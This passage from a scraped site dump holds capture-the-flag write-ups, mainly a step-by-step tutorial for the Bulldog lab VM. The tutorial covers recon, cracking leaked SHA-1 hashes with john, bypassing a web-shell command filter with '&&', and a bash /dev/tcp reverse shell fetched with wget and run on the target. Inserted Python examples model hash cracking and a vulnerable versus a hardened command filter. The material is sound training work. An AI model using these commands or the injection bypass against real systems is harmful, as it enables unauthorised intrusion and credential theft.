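@reboot         root    /usr/local/bin/start-james.sh
"""

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_system_crontab(text):
    """Return (user, command) pairs from system-style crontab text.

    /etc/crontab and the files under /etc/cron.d carry a user field between the
    schedule and the command; a personal crontab (crontab -l) does not, and the one
    belonging to root is not readable by an unprivileged user anyway.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        if line.startswith("@"):
            # @reboot / @hourly style: one schedule field, then user, then command
            fields = line.split(None, 2)
            needed = 3
        else:
            # m h dom mon dow: five schedule fields, then user, then command
            fields = line.split(None, 6)
            needed = 7
        if len(fields) < needed:
            continue
        jobs.append((fields[-2], fields[-1]))
    return jobs


def script_paths(command):
    """Absolute paths mentioned in a cron command line, e.g. /opt/tmp.py in
    'python /opt/tmp.py'. Splits on whitespace and the shell separators ; & |."""
    return [tok for tok in re.split(r"[\s;&|]+", command) if tok.startswith("/")]


def writable_root_jobs(jobs, writable=lambda p: os.access(p, os.W_OK)):
    """Jobs that run as root and reference a path the current user can write to.

    The writability check is injectable so the logic can be exercised against the
    constructed sample without touching the real filesystem.
    """
    hits = []
    for user, command in jobs:
        if user != "root":
            continue
        for path in script_paths(command):
            if writable(path):
                hits.append((path, command))
    return hits


if __name__ == "__main__":
    # Pretend /opt/tmp.py is the one file we can write, as on the box.
    found = writable_root_jobs(parse_system_crontab(SAMPLE_CRONTAB),
                               writable=lambda p: p == "/opt/tmp.py")
    for path, command in found:
        print("root runs a script we can edit: %s  (%s)" % (path, command))
```

On a target you would replace SAMPLE_CRONTAB with the contents of /etc/crontab, run the same parser over each file in /etc/cron.d, and drop the injected writable argument so the real os.access check is used. A job found this way is the hint; ownership of the script by root is not proof that the job runs as root, which is why the user field is checked. If a planted payload never calls back after a couple of cron intervals, treat it as a mistake in the setup rather than a slow job.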
Start by checking for typos, incorrect IPs, ports, etc.\nSoon\u0026hellip; # The root shell pops open in our second listener!\nFrom here we can do as we please, starting with the capture of the root flag.\ncat /root/root.txt\n7. Conclusion # My experience with this box underscored how important it is to actually be familiar with the territory. I haven\u0026rsquo;t been using Linux very long, and there is so much to know, so much that MIGHT be useful, that it can be paralyzing to find a place to start.\nIn this instance, I was able to find a foothold based on context and some prior knowledge. But I got a bit lucky. There have been boxes that stumped me because I knew there was something I just hadn\u0026rsquo;t learned yet.\nTime to crack open some books.\nThanks to HackTheBox and ch33zplz for this CTF!\n","date":"27 January 2018","externalUrl":null,"permalink":"/archive/ctf-writeups/solidstate-htb/","section":"Archive","summary":"","title":"CTF Writeup: Solid State on HackTheBox","type":"archive"},{"content":"","date":"23 January 2018","externalUrl":null,"permalink":"/tags/first-ctf/","section":"Tags","summary":"","title":"First-Ctf","type":"tags"},{"content":"","date":"23 January 2018","externalUrl":null,"permalink":"/series/firstctf/","section":"Series","summary":"","title":"FirstCTF","type":"series"},{"content":"","date":"23 January 2018","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nBefore We Start # Make sure you have set up your system according to the instructions in Part One!\nWe\u0026rsquo;ve set up our VMs, connected them to each other and are ready to boot. Let\u0026rsquo;s get into \u0026ldquo;character.\u0026rdquo;\nBulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? 
Why don\u0026rsquo;t you find out? :)\nAs a white-hat penetration testing team, we have been asked to test the new protections set up after the initial hacking. This type of internal testing is broken up into two groups: the Red Team and the Blue Team. These loosely align with \u0026ldquo;offense\u0026rdquo; and \u0026ldquo;defense\u0026rdquo; respectively. The blue team has set up a system they believe is more secure than it was before, and it is our job as the red team to find out how true that is.\nOur flag-capturing, root-accessing process will go something like this: (The terms below are not standard, I am using them to organize the process for you)\nGetting Connected\nInformation Gathering - What does the box offer? Where should we look?\nExternal Observation/Reconnaissance - Finding vulnerable points from the outside\nGaining Low-Privilege Access to the System - Attempting to gain access and pop a \u0026ldquo;user\u0026rdquo; shell\nInternal Observation/Enumeration - Finding vulnerable points from the inside\nPrivilege Escalation - Gaining root access via an exploit, a misconfiguration, or privileged information that was stored insecurely\nThe above process is not up to the standards used by professionals, and is meant to be more of a base on which to build a more comprehensive process of your own. It simply demonstrates a general outline of the steps we need to perform in order to get the flag. There are many standards for penetration testing, and the Penetration Testing Execution Standard is a great outline.\n1. Getting Connected # Locating the Target # Let\u0026rsquo;s get our tools ready to work - Boot up your Kali VM. Upon boot, type ifconfig and ensure it has been automatically assigned a host-only IP address starting with 192.168.56.xx\nBefore we do the same for Bulldog, we want to make sure we don\u0026rsquo;t miss an opportunity to learn something. 
Bulldog is set up to show us its host-only IP on startup.\nWe can look at this if we want to confirm the IP, but why miss the opportunity to learn how to use Kali to identify it?\nThe Bulldog VM will run in the background, even if we aren\u0026rsquo;t looking at it, and we will be interacting with it entirely through Kali. Therefore, shortly after boot, we can simply minimize it. If you accidentally view the IP, it isn\u0026rsquo;t the end of the world.\nPREVENT SPOILERS! # Minimize Bulldog right after boot while the screen looks something like this:\nReturn to your Kali VM. From this moment on, we will not need to exit it until Bulldog is conquered.\nWe know a little bit about our target system due to our setup process. It is being run through VirtualBox and is connected to a network with addresses of the form 192.168.56.xx. We also know our own system\u0026rsquo;s IP. These three pieces of information will allow us to find the IP of the target.\nTime to meet your first tool: nmap\nThe nmap network mapper is a fantastic tool for any kind of network interaction. It can show you information that computers on a network may \u0026ldquo;know\u0026rdquo; about one another but that isn\u0026rsquo;t necessarily obvious to the user. nmap can scan for vulnerabilities, identify software versions and much more.\nFirst, we will use it to sniff out the Bulldog.\nIf you run man nmap you can spend some time reading about all the flags and many functions. For now, we just need one flag: -sn\nThe -sn flag tells nmap to do host discovery only: probe each address in a defined scope and report which ones respond, without scanning any ports. On a directly attached network like our host-only one, a privileged nmap does this with ARP requests rather than ICMP pings, which is why a host that drops ping will still show up here.\nBulldog is hiding somewhere between 192.168.56.0 and 192.168.56.255, so let\u0026rsquo;s scan that range. 
The shorthand used for this range is 192.168.56.0/24. The /24 suffix is what is called \u0026ldquo;CIDR\u0026rdquo; notation: the first 24 bits of the address are fixed and the remaining 8 vary, giving the 256 addresses from .0 to .255.\nLet\u0026rsquo;s run the first command of the pentest.\nnmap -sn 192.168.56.0/24\nBecause the targets are on the same network segment, nmap is able to read the unique hardware (MAC) address of each device found. It looks up the first three bytes of each address, the vendor prefix, to associate each device with a possible manufacturer. In our case, we get two boxes with a network interface \u0026ldquo;manufactured by\u0026rdquo; VirtualBox.\nSince we only have two hits from VirtualBox machines, and we know our machine\u0026rsquo;s IP, we know which one is Bulldog.\nYou may see two other devices that are not VirtualBoxes. One of these is the host OS itself, and the other is the host-only network\u0026rsquo;s DHCP server. The DHCP server automatically assigns IP addresses to the devices on our network.\nnmap may have given you an error about DNS if Kali is not connected to the internet. We can ignore such an error. Since we are not connected to the internet, Kali\u0026rsquo;s attempts to translate the IP addresses it finds into human readable names using a DNS server will fail. That\u0026rsquo;s okay, we have another way of identifying Bulldog.\nAdding Bulldog to Your Hosts File # It can be a bit cumbersome to type in 192.168.56.102 every single time, so we are going to set up a shortcut.\nAt /etc/hosts, we have a file that contains these \u0026ldquo;shortcuts.\u0026rdquo; These are called hostnames. If we add a line pointing our IP to a name like bulldog.ctf we can save ourselves some trouble.\nIF YOU MAKE A TYPO HERE, YOU CAN MESS UP YOUR SYSTEM!\nIf you accidentally use \u0026gt; instead of \u0026gt;\u0026gt; - your hosts file will be overwritten! 
This will require a manual fix - don\u0026rsquo;t let it happen.\nAdd the IP address to your hosts file using this command (it writes to a root-owned file, so it has to run as root; on a Kali that logs you in as a normal user, pipe the same line into sudo tee -a /etc/hosts instead):\necho \u0026quot;192.168.56.102 bulldog.ctf\u0026quot; \u0026gt;\u0026gt; /etc/hosts\nRun ping bulldog.ctf to see that your system has associated the address with the hostname bulldog.ctf\nLet\u0026rsquo;s create a working directory for our pentest, and we\u0026rsquo;ll get started in earnest.\nmkdir bulldog \u0026amp;\u0026amp; cd bulldog\n2. Information Gathering/Reconnaissance - What are we looking at? # Enumerating Bulldog from the Outside # Now that we have found Bulldog\u0026rsquo;s address, we have exhausted all the info we have. What IS Bulldog? Is it running a website? Hosting files? Can it run Doom?\nnmap\u0026rsquo;s -sV flag can answer all of these questions.\nVersion detection (-sV) attempts to identify what services the box is running on which ports, and what software version it uses to do so.\n-F enters \u0026ldquo;Fast\u0026rdquo; mode - this only scans the 100 most commonly used ports. This is usually enough to find something interesting. If none of these ports produce results, we can scan deeper (all 65535 ports with -p-) and see if we find additional information.\nFor all of our scans, we are also going to run a quick, hacky little logging method.\nCOMMAND | tee COMMAND_output.txt\nThis will save our tool\u0026rsquo;s terminal output to a text file in the bulldog directory - as long as it is our working directory. If we wanted to write a report, repeat our process quickly, or just forgot a result, it pays to have logs.\nRun nmap again to scan Bulldog, making sure to log the output.\nnmap -sV -F bulldog.ctf | tee nmap_quickscan.txt\nThis scan has already provided plenty of useful information:\nSSH (a secure remote command line) is running, but on a non-standard port. Normally SSH is on port 22.\nWe know that the version of SSH it is running is the Ubuntu build - we now know Bulldog is running Ubuntu! 
Ports 80 and 8080 are running HTTP - there is a website for us to visit.\nThe web server identifies itself as Python-based, version 2.7 - Bulldog runs Python 2.7.\nLet\u0026rsquo;s investigate the website in our browser:\nWe can find the main page and the /notice page, but nothing on either seems particularly interesting. Viewing the sources on the pages is possible, but nothing there jumps out at us either.\nThere is a way for us to dig into this website a bit deeper.\nDirectory Bruteforcing # We suspect there is more to this website than the 2 pages we have seen, but we haven\u0026rsquo;t found any links to take us anywhere else. There might be some pages like /mail, /login, or other common names, but we don\u0026rsquo;t want to just type them in manually in the browser.\nEnter dirb. This tool takes a wordlist of common webpage names, appends each to a URL and simply checks whether it exists. We can feed it different flags in order to do things like dig deeper, look for extensions like .php and more.\ndirb http://bulldog.ctf -r | tee dirb_result.txt\nThe -r flag tells dirb NOT to search recursively. When you do your own CTFs, you may not want to enable this option, but we will use it here to demonstrate our process while keeping things light. If we wanted to, we could specify a wordlist for dirb to use, but the default will serve our needs just fine.\nWe get 3 hits - /admin, /dev, /robots.txt\nProbing the Website for Avenues of Attack # Let\u0026rsquo;s start with /robots.txt - since that might contain the names of some restricted areas. A robots.txt file asks well-behaved web crawlers not to fetch the paths it lists. A tool like dirb does not obey it, but the file is still worth reading first, because administrators often list exactly the paths they would rather nobody found.\nSince we know there is a robots.txt, we can simply visit it in the browser and read the entries with our eyeballs.\nThe BlackHat German Shepherds have left the mark of a truly skilled hacker - ASCII ART! There is nothing else here. 
It is just a .txt - so there is no source to view.\nWhat does /admin have to offer?\nThis page gives us two key pieces of information just by existing:\nThe site can be logged into - giving us a possible avenue of attack\n\u0026ldquo;Django\u0026rdquo; is a potentially useful term\nEven if you don\u0026rsquo;t know what Django means in this context, useful terms like this may lead to productive searches in the future.\nSome potentially interesting info lies in the page source, but there may be some lower hanging fruit on the /dev page. It can be tempting to dive deeply into one aspect of a CTF right off the bat, but resist the urge. So far, my (somewhat limited) experience has shown that reconnaissance should focus on breadth before depth.\nThis page is full of information, laid out for us by the designers themselves. Here are the key points:\nThe previous attackers had a good strategy, but odds are we won\u0026rsquo;t be able to recreate it entirely.\nSeveral things are listed as NOT present: PHP, a CMS (like WordPress), MongoDB, etc. We can cross these off our list of possibilities.\nSSH is available, in addition to a Web-Shell of their own design (linked to on the page)\nA custom-made program is in the works, but isn\u0026rsquo;t finished yet\nA team hierarchy as well as contact information. If this were a real company, this could be used in social engineering.\nIf we try that big Web-Shell link, all we find is a message telling us to log in. This is a very interesting lead. If we are able to log in as one of the users - we might get access to some sort of settings panel we can leverage.\nLooking at the /dev page source might provide some more information.\n\u0026ldquo;It\u0026rsquo;s not like a hacker can do anything with a hash\u0026rdquo; - sounds like an invitation to me!\n3. 
Making Use of Password Hashes # Not only do we have a listing of contacts for each member of the company, but we have them paired with what appear to be password hashes!\nWhat are hashes? # Hashing resembles encryption but is not encryption: there is no key, and the operation is designed to be one-way. When a user logs in to a system, the system will check their credentials against its database to see if the password is correct. However, instead of storing the passwords in plaintext, the system stores them as \u0026ldquo;hashes.\u0026rdquo; To better explain this, we are going to use encryption as an analogy for hashing.\nAlgorithms are often explained as black, white, or grey box. For our purposes, a \u0026ldquo;white box\u0026rdquo; algorithm is completely understood and reversible. Black is unknown entirely, and not reversible. Grey is somewhere in the middle.\nRot13 is white box because we understand and can easily perform every single step. It is even its own reverse. Since it affects individual letters, it also does not have what is called \u0026ldquo;avalanche\u0026rdquo; in cryptography. If we alter one small part of a known plaintext, only one small part of the ciphertext will be changed. hello rot13\u0026rsquo;s to uryyb while jello rot13\u0026rsquo;s to wryyb. The ciphertext will always be the exact length of the plaintext as well, which is very revealing.\nThe md5 hashing algorithm is not simple to understand, but it is openly published. We can understand the process it uses, but it is very complicated and not feasible to reverse. For this reason, we are calling it grey box. It also has a strong avalanche effect: change one character of the input and roughly half of the output bits flip. md5 hashes are always the same length, no matter how long the plaintext is.\nAs nice as md5 sounds, it is considered obsolete: practical collision attacks against it have been published, and because it is fast and is usually stored without a salt, password hashes made with it fall quickly to dictionary and brute-force attacks. It is nonetheless still in wide use, as is SHA-1.\nHow are hashes used in the login process? 
# When a user enters a password string, the system runs the hashing algorithm on it and compares the result with the hash stored for that user. If it doesn\u0026rsquo;t match, access is not granted; the password itself never needs to be stored.\nIs any of this relevant to Bulldog? # If an attacker were to somehow get a list of hashes, they could attempt to \u0026ldquo;reverse\u0026rdquo; the hashes using a dictionary attack. This simple attack uses the attacker\u0026rsquo;s system to run the hashing algorithm on known words, and then compares the results to a list of acquired hashes.\nIf the hash of a known word matches a user\u0026rsquo;s password hash, that word is the user\u0026rsquo;s password.\nModern systems can perform this operation at speeds that would make Alan Turing faint. A GPU-powered md5 dictionary attack can run billions of hashes per second. However, the number of possible combinations of characters grows exponentially with password length. The time it would take to brute force a reasonable set of possibilities may be unrealistic. We will need to use a good wordlist and hope that one of our users is not very creative.\nPreparing Our Dictionary Attack # In your Kali terminal, run gedit to open up the text editor.\nFrom the /dev page source, copy all lines containing hashes into the editor and save it as raw_creds.txt in your working directory.\nClose gedit - we are going to clean up our text from the terminal.\nOur credentials file must be in user:hash format in order for our dictionary attack tool to make use of it.\nFor the sake of time, I am going to show you a quick method of achieving this result from the command line based on the cut, paste and tr commands. If you\u0026rsquo;d like to understand these commands better, you can check out their man pages.\ncut separates lines of text into columns based on a chosen character.\npaste takes lines from two text files and creates a single file of two columns - one column from each file. 
tr replaces one group of characters with those from another group. We only need to replace one character.\nFirst, we extract the hashes and save them to a file:\ncat raw_creds.txt | cut -d '!' -f 2 | cut -d '-' -f 3 \u0026gt; hashes.txt\nThen, do the same for the users:\ncat raw_creds.txt | cut -d '\u0026lt;' -f 1 | cut -d ':' -f 2 \u0026gt; users.txt\nFinally, paste them together, and use tr to change the tab column separators into colons:\npaste users.txt hashes.txt | tr '\\t' ':' \u0026gt; crackme.txt\nOur file is ready, we just need to check what kind of hashes we are attempting to crack.\nCopy one of the hashes, and then paste it into the hash identifying command hashid\nhashid '6515229daf8dbdc8b89fed2e60f10743'\nhashid tells us that our hashes are most likely SHA-1. A quick sanity check of your own is the length: a raw SHA-1 digest is 40 hex characters, an md5 digest is 32. SHA-1 is just as fast and unsalted as md5 when used this way, so it is one of the easier hash types to crack. Let\u0026rsquo;s introduce our file to our friend John.\nJohn Rips into Our Hashes # John The Ripper, or john, is one of the best tools out there for performing a dictionary attack. It has a simple syntax and is often all we need when it comes to offline password recovery. In this case, all we need to specify is what file we are attempting to crack, and what format to use.\njohn crackme.txt --format=Raw-SHA1\nVery quickly, we get a result - and I can\u0026rsquo;t say it is a surprising one. Cracked passwords are stored in john\u0026rsquo;s pot file, so we can interrupt john with CTRL-C and print them again later with john --show --format=Raw-SHA1 crackme.txt\n4. Gaining A Low-Privilege Shell # Making Use of Our Credentials # Let\u0026rsquo;s go right for the most rewarding result and try to log in to ssh. Our nmap scan told us that ssh was at a non-standard port, so we can check our logs to see which port we need to specify.\nssh nick@bulldog.ctf -p 23\nThis fails, but why not shoot for the moon and try to log in as root right away?\nssh root@bulldog.ctf -p 23\nOh well, didn\u0026rsquo;t hurt to try. SSH isn\u0026rsquo;t the only place we can log in. Try /admin.\nThis works! 
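To tie the extraction, identification and cracking steps together, here is an added Python example (mine, not the commands from the tutorial and not john): it pulls user and hash pairs out of page-source lines of the shape the cut commands above expect, a label, a colon, an e-mail address and then an HTML comment holding the hash; guesses the algorithm from the digest length; writes the user:hash layout john wants; and runs a dictionary attack with hashlib. The page-source sample and the wordlist are constructed for the example, and the hashes in it are generated from made-up passwords at run time, so none of them are real values from the box.

```python
import hashlib
import re


def _sha1_hex(word):
    return hashlib.sha1(word.encode()).hexdigest()


# Constructed page-source sample in the shape the cut commands above expect:
# "Label: address<br><!--hash-->". The digests are generated here from made-up
# passwords, so none of them are the values from the box.
SAMPLE_SOURCE = """<!--Need these password hashes for testing. Django's default is too complex-->
Team Lead: alan@bulldogindustries.com<br><!--%s-->
Back-up Team Lead: william@bulldogindustries.com<br><br><!--%s-->
Front-end Developer: nick@bulldogindustries.com<br><!--%s-->
""" % (_sha1_hex("correct horse battery staple"), _sha1_hex("bulldog"), _sha1_hex("password1"))

# label, colon, e-mail, then the last HTML comment on the line holding a hex digest
CRED_LINE = re.compile(r"^[^:<\n]+:\s*([^<\s]+)<.*<!--([0-9a-fA-F]{32,128})-->", re.M)

WORDLIST = ["123456", "password", "bulldog", "password1", "letmein"]  # stand-in for rockyou.txt


def extract_credentials(source):
    """(user, hash) pairs; the user is the local part of the e-mail address."""
    return [(email.split("@")[0], digest.lower()) for email, digest in CRED_LINE.findall(source)]


def guess_algorithm(digest):
    """An unsalted hex digest gives its algorithm away by length alone."""
    return {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}.get(len(digest), "unknown")


def to_john_format(creds):
    """One user:hash per line, the layout john reads."""
    return "".join("%s:%s\n" % (user, digest) for user, digest in creds)


def dictionary_attack(creds, wordlist, algorithm):
    """Hash each candidate word once and look it up against every target hash,
    which is what john does for fast unsalted formats such as Raw-SHA1."""
    targets = {}
    for user, digest in creds:
        targets.setdefault(digest, []).append(user)
    cracked = {}
    for word in wordlist:
        digest = hashlib.new(algorithm, word.encode()).hexdigest()
        for user in targets.get(digest, []):
            cracked[user] = word
    return cracked


if __name__ == "__main__":
    creds = extract_credentials(SAMPLE_SOURCE)
    algorithm = guess_algorithm(creds[0][1])
    print(to_john_format(creds))
    print("format:", algorithm)
    print("cracked:", dictionary_attack(creds, WORDLIST, algorithm))
```

Two users fall to the five-word list and one does not, which is the realistic outcome: a dictionary attack only finds passwords that are in the dictionary, and hashing each word once for all targets is what makes unsalted hashes so cheap to attack in bulk. Back to Bulldog: the /admin login we just tried succeeded.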
We have site access.\n\u0026ldquo;You don\u0026rsquo;t have permission to edit anything\u0026rdquo; doesn\u0026rsquo;t seem promising at first. But now we are authenticated, and can access the formerly inaccessible /dev/shell page.\nExploiting the Web-Shell # The shell claims that we can only run a list of \u0026ldquo;friendly\u0026rdquo; commands, and all commands are run directly on the server itself. If we figure out how to get arbitrary commands through, we can get the server to do our bidding. All we need to do is bypass this filter.\nWe can hypothesize that the command filtering employs some kind of simple if statement. If a command contains one of the allowed commands, the server executes the inputted command.\nPerhaps the if statement only checks whether the input contains one of the approved commands - not whether the input is made up only of approved commands.\nIf that is the case, we might be able to bypass the filter by using an approved command and immediately following it with any command we like. This would entail running two commands on the same line.\nTo check our theory, we need to prove two things:\nThe Web-Shell allows us to run multiple commands at a time\nThe second command run does not need to be one of the approved commands\nWe know how to run commands on the same line using the ; and \u0026amp;\u0026amp; separators, so let\u0026rsquo;s give those a try.\nIn the webshell, run ls; pwd\nBoth of these commands are on the \u0026ldquo;nice\u0026rdquo; list, but before running some nasty commands we need to prove our concept.\nThey\u0026rsquo;ve caught us! The computer police are on the way to arrest you now - thanks for playing.\nPerhaps we can have more luck with ls \u0026amp;\u0026amp; pwd\nIt worked! We can run more than one command at a time. That also tells us something about the filter: it rejects the ; character specifically rather than understanding the command line, so other separators (\u0026amp;\u0026amp;, and probably | and a single \u0026amp;) slip through. 
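An added Python example (not the source of the Bulldog web shell, which we have not seen) of the two filter designs at issue here: a naive check that bans the ; character and otherwise only asks whether an approved command appears somewhere in the input, which is exactly the behaviour we just observed, beside a hardened version that tokenizes the input, requires the first token to be on the allow-list, rejects shell metacharacters and never goes through a shell at all. The allow-list is an assumption for the demo.

```python
import shlex
import subprocess

# The allow-list is an assumption for the demo; the real web shell advertises its own.
ALLOWED = {"ls", "pwd", "echo", "cat"}


def naive_filter_allows(user_input):
    """A model of the filter we are hypothesising, matching what we just observed:
    ';' is banned outright, and otherwise the input passes if an approved command
    appears *anywhere* in it. 'pwd && id' sails through."""
    if ";" in user_input:
        return False
    return any(cmd in user_input for cmd in ALLOWED)


def naive_run(user_input):
    """The vulnerable design: pass the whole line to a shell once the filter is happy.
    Returns None when the filter rejects the input ('They've caught us!')."""
    if not naive_filter_allows(user_input):
        return None
    return subprocess.run(user_input, shell=True, capture_output=True, text=True).stdout


SHELL_META = set(";&|`$<>(){}\n\r")


def strict_run(user_input):
    """The hardened design: no shell at all. Reject any metacharacter, split the
    line into argv with shlex, require the *program* (argv[0]) to be on the
    allow-list, and exec it directly with its arguments."""
    if any(ch in SHELL_META for ch in user_input):
        raise ValueError("shell metacharacters are not allowed")
    argv = shlex.split(user_input)
    if not argv or argv[0] not in ALLOWED:
        raise ValueError("command %r is not on the allow-list" % (argv[:1] or user_input))
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "pwd && id"
    print("naive filter lets %r through: %s" % (payload, naive_filter_allows(payload)))
    print(naive_run(payload))
    try:
        strict_run(payload)
    except ValueError as exc:
        print("strict filter:", exc)
    print(strict_run("echo still works for approved commands"))
```

Note that even the strict version is only one layer: an allow-listed cat will happily read any file the web user can, so the allow-list has to be chosen with the arguments in mind, not just the program name. Back in the web shell, the next test is whether the second command has to be approved at all.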
Let\u0026rsquo;s try something unapproved, like id, or cd\nIn the webshell, run pwd \u0026amp;\u0026amp; id \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; pwd\n/tmp is a useful directory since it is world-writable by default. It is a great place for us to set up camp on the target system.\nIf you know a little Linux, the word sudo will catch your eye in the image above. If you are unfamiliar with sudo, know that it can be used to run commands with superuser privileges. We won\u0026rsquo;t be needing to use that functionality here, and can escalate our privileges with other methods.\nWith our concepts proven, we can take advantage of our ability to execute code remotely.\nOur Shelling Process # Our goal now is to get Bulldog to run a \u0026ldquo;reverse shell\u0026rdquo; process. This process allows us to use a Kali terminal window to remotely control Bulldog.\nTo do this, we employ the incredibly useful nc tool. When the reverse shell on Bulldog begins \u0026ldquo;talking,\u0026rdquo; we will use nc to make sure Kali is \u0026ldquo;listening.\u0026rdquo; Then, the two systems can communicate freely and we can give orders directly to Bulldog.\nThere are many different kinds of reverse shells, and even more ways to implement them. After trial and error, I\u0026rsquo;ve found a method that is reliable, but entails more steps than the average reverse shell. The Bulldog webshell is a bit limited, but this process will circumvent these limitations and we will gain access.\nHere is an overview:\nSave a single command that connects a reverse shell back to our Kali machine to a file - this is known as a script. Create it, but don\u0026rsquo;t run it on Kali.\nUse Kali as a web host, allowing Bulldog to download files from Kali.\nRun commands in the web shell to download the script to Bulldog from Kali.\nRun commands in the web shell to execute the script on Bulldog.\nBulldog begins talking, and Kali is set up to listen. Shell created. 
I chose port number 1234 arbitrarily because it is easy to remember. You can use any number you like, as long as nothing else on Kali is already listening on it. Pentesters like to use ports 1337 and 31337 for fun. I like to use port numbers 51000 and higher since they are not often assigned to a standard protocol.\nShell Step 1 - Writing the Script # First, we need to create the script. This is as simple as writing the reverse shell command to a file that we give a .sh extension.\nRun the following command on Kali in your working ~/bulldog directory. Replace KALI_IP with Kali\u0026rsquo;s host-only IP address - 192.168.56.xx\necho \u0026quot;bash -i \u0026gt;\u0026amp; /dev/tcp/KALI_IP/1234 0\u0026gt;\u0026amp;1\u0026quot; \u0026gt; script.sh\nThis one-liner is pure bash: /dev/tcp/HOST/PORT is a path that bash itself turns into a TCP connection, \u0026gt;\u0026amp; sends the interactive shell\u0026rsquo;s stdout and stderr to it, and 0\u0026gt;\u0026amp;1 makes that same connection its stdin. That is why the script has to be run with bash rather than sh.\nShell Step 2 - Hosting the Script # Next, we need to set up Kali as a file server that Bulldog can download from. Kali contains a built-in method for doing this using Python. We just have to provide a port number.\nAgain, run this inside ~/bulldog\npython -m SimpleHTTPServer 1234\n(That is the Python 2 module; on a Python 3 Kali the equivalent is python3 -m http.server 1234.)\nLet this run, then go to the browser to run step 3.\nShell Step 3 - Downloading the Script # The command we run through the webshell will need to download the script from Kali and make it executable.\nWe will need to break our command down into parts:\npwd to trick the if statement\ncd /tmp to change to a directory where we have permission to download files\nwget http://KALI_IP:1234/script.sh to download to that directory\nchmod +x script.sh to make the script executable\nRun this in the webshell: pwd \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; wget http://KALI_IP:1234/script.sh \u0026amp;\u0026amp; chmod +x script.sh\nWhen you return to your Kali terminal window, you will see that the file has been accessed by Bulldog\u0026rsquo;s IP.\nShell Step 4 - Stopping the Webserver and Starting the Listener # Kill the python hosting process with CTRL-C, since the listener is about to reuse the same port. Then we will start up the nc listener.\n-l tells nc to listen\n-n tells nc to 
not bother trying to convert IP addresses into hostnames (like bulldog.ctf)\n-v tells nc to be verbose - outputting more information for us to read\n-p specifies which port nc should listen on. This needs to match the port our shell script uses to connect to Kali.\nnc -lnvp 1234\nShell Step 5 - Finally Popping the Shell # With Kali standing by listening, we just need Bulldog to start talking.\npwd to trick the if statement\ncd /tmp to return us to the directory where the script is stored\nbash script.sh to run it!\nIn the webshell run pwd \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; bash script.sh\nIf it works, the browser window should say \u0026ldquo;connecting\u0026rdquo; but not actually load, because the web request is now tied up by the shell it started.\nCheck your terminal window where you put in the nc command. It will contain a command shell for django@bulldog!\n5. Enumeration - Looking for Internal Weaknesses # This user shell is primitive. Very primitive. It does not have tab completion, CTRL-C handling or the other bells and whistles our Kali shell has. This shell can be upgraded, but we will only be doing that a little later on. For this box, we can get by with a very primitive shell.\nIf you press CTRL-C to stop a process, the keystroke kills our local nc instead, which drops the connection and the shell with it. If you need to restart your shell, simply repeat steps 4 and 5 of our shell process.\nThis CTF simulates a real-world experience, so we may see some common user missteps. People will often leave important notes and reminders simply lying around on their system. These users would leave these things in an email, or maybe their /home folder.\nLet\u0026rsquo;s see what we can see in the /home directory.\ncd /home \u0026amp;\u0026amp; ls\nWe can see here that our website user, Nick, doesn\u0026rsquo;t have a home folder on this machine. This probably means the password we used to log in to the website is of no further use to us. 
There are folders for bulldogadmin and django, however.\nOur shell, and the id command, tells us that we are django, so we should have full access to that folder. bulldogadmin sounds like it would contain some files we might find more interesting than what django has to offer.\nMight as well check to see if root_password_do_not_touch.txt is inside - and if we can read it.\nls -l /home/bulldogadmin\nEmpty? That can\u0026rsquo;t be. Perhaps the files are hidden?\nls -a /home/bulldogadmin\nAll of the files in this directory are hidden! Most of them are configuration files found in every user\u0026rsquo;s folder by default, but not .hiddenadmindirectory. This folder is calling to us - let\u0026rsquo;s take a closer look.\nA period at the beginning of a file name marks the file as hidden, but it is also part of its name. If we want to enter this directory, all we need to do is include the period in our command.\nEnter this folder and list its contents - making sure we look for more hidden files.\ncd /home/bulldogadmin/.hiddenadmindirectory \u0026amp;\u0026amp; ls -a\nA note? Could this be our AdminPassNoHackersPlz.txt file?\ncat note\nVery interesting. \u0026quot;\u0026hellip;the webserver is the\u0026hellip; \u0026hellip;one who needs to have root access\u0026hellip;\u0026quot; is all I needed to hear to get me interested. The other lines that got my attention were \u0026ldquo;Once I\u0026rsquo;m finished with it, a hacker wouldn\u0026rsquo;t even be able to reverse it,\u0026rdquo; and \u0026quot;\u0026hellip;it\u0026rsquo;s still a prototype right now.\u0026quot;\nMaybe we can reverse engineer this customPermissionApp and find something useful.\n6. Reversing to Root # Reverse engineering can be a complicated process that would normally exceed the scope of this document. But there are a few simple steps we can try that might be productive.\nThe customPermissionApp isn\u0026rsquo;t a text file, but is likely a compiled program. 
We can confirm this with file customPermissionApp\nAs a result, simply trying to read it with cat will dump binary characters that have the potential to garble our terminal and shell. To get around this, we can use strings.\nstrings reads a file but only outputs runs of friendly, human readable characters to the terminal. This file might be pretty long, however, so we should pipe it to the less command as well. Unfortunately, our shell is too primitive at this stage to use less.\nWe need what is called a tty, which allows for more interactivity. A reliable way of getting a tty uses python, which we know our system is running from way back when we did our nmap scans.\npython -c 'import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;)'\nThis may throw an error, but will still work. The error comes from the /bin/bash part of our command, and is the same as the error we saw when we started the reverse shell.\nWe can now run our strings command and pipe it directly into less\nstrings customPermissionApp | less\nRunning this will produce a warning, saying WARNING: terminal is not fully functional. This doesn\u0026rsquo;t stop us from moving forward.\nWe have isolated all the easily read characters, so let\u0026rsquo;s see if anything jumps out at us.\nThe first thing I noticed was sudo su root at the bottom. If a user is allowed to use sudo and runs this command, the system asks for their password, and then switches the terminal from a user shell to a root shell. Note that the system does not ask for the root password to upgrade a shell from user to root, but merely the sudo user\u0026rsquo;s own password. sudo su doesn\u0026rsquo;t run a single command as root, but logs in as root. This is exactly what we want to achieve.\nWe know that sudo su requires a password, but look at this line from the application:\nUsage: ./customPermissionApp \u0026lt;username\u0026gt;\nThe application doesn\u0026rsquo;t appear to ask for a password, does it? 
